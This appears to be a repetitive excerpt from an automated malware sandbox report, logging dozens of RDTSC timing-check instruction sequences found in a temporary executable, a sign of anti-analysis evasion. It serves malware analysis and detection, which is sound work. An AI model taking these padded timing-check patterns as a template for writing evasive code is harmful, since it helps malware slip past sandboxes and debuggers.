Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4D48C8 second address: 4D48CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4D4B81 second address: 4D4B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4D4B86 second address: 4D4B8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4D4E95 second address: 4D4E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4D4FD9 second address: 4D501C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F742CC44208h 0x00000008 pushad 0x00000009 popad 0x0000000a jnp 00007F742CC4420Eh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F742CC4420Fh 0x00000019 push eax 0x0000001a jo 00007F742CC44206h 0x00000020 jmp 00007F742CC44210h 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4D695B second address: 4D6975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D6h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2FA8 second address: 4E2FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2FAE second address: 4E2FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2FB2 second address: 4E2FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2FB8 second address: 4E2FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2FC5 second address: 4E2FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E1351 second address: 4E1358 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E18B4 second address: 4E18E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F742CC44221h 0x0000000a jmp 00007F742CC4420Bh 0x0000000f jmp 00007F742CC44210h 0x00000014 pushad 0x00000015 jo 00007F742CC44206h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E1A44 second address: 4E1A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F742CEB81D0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E1BCD second address: 4E1BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E1D50 second address: 4E1D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E1D56 second address: 4E1D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E1D5A second address: 4E1D5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2719 second address: 4E271F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E271F second address: 4E2723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2DE6 second address: 4E2DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2DEC second address: 4E2DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2DF2 second address: 4E2DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2DFB second address: 4E2E05 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4E2E05 second address: 4E2E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F742CC44206h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4EA24C second address: 4EA250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4EA250 second address: 4EA26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44211h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F742CC44206h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4EA38D second address: 4EA393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4EA393 second address: 4EA397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4F9F0E second address: 4F9F12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4FBB6E second address: 4FBB72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4FBB72 second address: 4FBB82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007F742CEB81C6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 4FBB82 second address: 4FBBBF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F742CC44212h 0x00000008 jp 00007F742CC44208h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F742CC44211h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 jnc 00007F742CC44206h 0x0000001f popad 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 501EA1 second address: 501EC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F742CEB81CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 501EC6 second address: 501ED0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F742CC44206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 505285 second address: 505289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 505289 second address: 50528F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50528F second address: 50529A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F742CEB81C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50529A second address: 5052A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50BD36 second address: 50BD3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50BD3A second address: 50BD40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50BD40 second address: 50BD47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50BD47 second address: 50BD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44211h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E02A second address: 50E031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E031 second address: 50E04F instructions: 0x00000000 rdtsc 0x00000002 jno 00007F742CC44212h 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F742CC44206h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E04F second address: 50E053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50E053 second address: 50E076 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44213h 0x00000007 jg 00007F742CC44206h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 50F647 second address: 50F6B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F742CEB81D2h 0x00000010 jmp 00007F742CEB81D4h 0x00000015 jmp 00007F742CEB81D5h 0x0000001a popad 0x0000001b jmp 00007F742CEB81D5h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F742CEB81CCh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 51609E second address: 5160A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160A9 second address: 5160AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160AD second address: 5160C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F742CC44210h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160C9 second address: 5160D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F742CEB81CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160D6 second address: 5160E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5160E0 second address: 5160F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F742CEB81C6h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514961 second address: 514997 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F742CC44212h 0x00000008 jmp 00007F742CC44217h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jo 00007F742CC4421Eh 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514997 second address: 51499F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 51499F second address: 5149A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514F3E second address: 514F47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514F47 second address: 514F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F742CC44206h 0x0000000f ja 00007F742CC44206h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 514F5C second address: 514F62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 519EA9 second address: 519EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CC44216h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53A26B second address: 53A281 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F742CEB81CAh 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 426087 second address: 42608F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 426080 second address: 426087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53C1C3 second address: 53C205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44211h 0x00000009 jmp 00007F742CC44211h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F742CC44219h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53BF16 second address: 53BF1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 53BF1A second address: 53BF24 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F742CC44206h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5573A0 second address: 5573B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556201 second address: 556208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55635C second address: 556362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556362 second address: 55637D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CC44210h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55637D second address: 556381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556381 second address: 55638F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55638F second address: 556393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 556504 second address: 55650A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5567CF second address: 5567EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F742CEB81D8h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 5567EB second address: 5567F0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55703B second address: 55703F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55703F second address: 55704A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 558AD9 second address: 558B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jno 00007F742CEB81C6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e jnp 00007F742CEB81C6h 0x00000014 jc 00007F742CEB81C6h 0x0000001a popad 0x0000001b jmp 00007F742CEB81D4h 0x00000020 popad 0x00000021 pushad 0x00000022 push ebx 0x00000023 jmp 00007F742CEB81D9h 0x00000028 pop ebx 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 558B28 second address: 558B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B5A2 second address: 55B5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B697 second address: 55B6A8 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F742CC44206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B87F second address: 55B887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55B887 second address: 55B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BB21 second address: 55BB6B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 push dword ptr [ebp+122D2F99h] 0x0000000e call 00007F742CEB81D0h 0x00000013 mov dx, 5F92h 0x00000017 pop edx 0x00000018 call 00007F742CEB81C9h 0x0000001d jno 00007F742CEB81D4h 0x00000023 push eax 0x00000024 jc 00007F742CEB81D0h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BB6B second address: 55BB93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F742CC44219h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BB93 second address: 55BBB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F742CEB81D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55BBB0 second address: 55BBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55EC21 second address: 55EC58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007F742CEB81C6h 0x00000009 jmp 00007F742CEB81D5h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F742CEB81E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F742CEB81CEh 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55EC58 second address: 55EC5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe RDTSC instruction interceptor: First address: 55EC5C second address: 55EC62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
